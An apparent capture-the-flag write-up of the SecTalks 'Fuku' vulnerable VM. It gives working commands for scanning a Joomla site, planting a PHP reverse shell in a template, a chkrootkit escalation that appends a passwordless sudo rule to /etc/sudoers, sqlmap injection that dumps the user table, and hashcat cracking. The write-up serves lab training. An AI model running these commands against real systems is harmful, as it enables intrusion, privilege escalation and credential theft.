SecTalks: BNE0x02 - Fuku

Tools:

  • netdiscover
  • Nmap
  • Netcat
  • Wfuzz
  • Nikto
  • Joomscan

Vulnerability:

Use Joomla! Remote Admin Chnage Password Exploit

Use netdiscover to detect target IP address

netdiscover -i eth0 -r 192.168.56.0/24

192.168.56.134 is the target.

Then run nmap to detect opening ports and running services on the target machine.

nmap -sV -v -O -A -T5 192.168.56.134 -p-

as we can see, almost every port is opening. I guess the target machine doesn’t want hacker know which services are exactly running.

I use nc to read some ports such as 80 22 23. Port 22 gets result like:

1

SSH-2.0-OpenSSH 6.7p1 Ububtu-5ubuntu1

while the rest of ports get the results:

looks like I need to filter ports like these. I wrote a script to make life easier filter.py

After running the script, I find only port 22 and port 13370 are opening.

check the http://192.168.56.134:13370. I got this

review the code:

Looks like Joomla!

use wfuzz to scan

wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --hc 404 http://192.168.56.134:13370/FUZZ 2>/dev/null

get some interesting path names

use Nikto to scan

nikto -h http://192.168.56.134:13370

check http://192.168.56.134:13370/administrator/ get the login page:

Now I can confirm it is Joomla!

use joomscan to scan:

joomscan -u http://192.168.56.134:13370

get the result:

follow the steps:

  • input new password for admin

Since it is Japanese version, I followed my post sickos1.2 to upload php reverse shell (usr/share/webshells/php/php-reverse-shell.php).

I will edit beez file, copy the php reverse shell code to it and replace the IP address and port

set up netcat and get the shell

However, I cannot execute most commands even python

try:

python2.7 -c 'import pty; pty.spawn("/bin/bash")'

works!

Now try to enumerate the os.

ps aux |grep root

looks like the chkrootkit 0.49 is available.

I followed my previous post sickos1.2 to upload php reverse shell (usr/share/webshells/php/php-reverse-shell.php) to get the root:

1

echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update

then:

chmod 777 /tmp/update

then:

ls -al /etc/sudoers

finally get the root:

sudo su

Exploit Joomla HD FLV Player SQL Injection

in http://192.168.56.134/, I found the target uses HD FLV Player

check the source code:

searchsploit HD FLV

follow the instructions:

1

sqlmap -u "http://192.168.56.134:13370/index.php?option=com_hdflvplayer&id=1" -p id --dbms mysql --tables --level=5 --risk=3

now get the columns of the table jos_users

1

sqlmap -u "http://192.168.56.134:13370/index.php?option=com_hdflvplayer&id=1" -p id --dbms mysql -T jos_users --columns

now I am interested in column username and password

1

sqlmap -u "http://192.168.56.134:13370/index.php?option=com_hdflvplayer&id=1" -p id --dbms mysql -T jos_users -C username,password --dump

The first part should be hash and the second part should be salt. I used joomla password crack tool joomlacrack.pl. Here is also my python version crackjoomla.py

crack admin’s password now

Then login as admin, upload php reverse shell, same as I worked in the first part of this post.

Aslo, since the hash format is like hash:salt. I found the hashcat example hashes, the MD5 format should be md5($pass.$salt), so that in hashcat for option -m the value should be 10 (hashcat –help, check the * Hash types)

use hashcat crack:

hashcat -m 10 -a 0 -o joompass.txt --remove 61.hash /usr/share/wordlists/rockyou.txt

DONE

chrootkit, joomla!, vulhub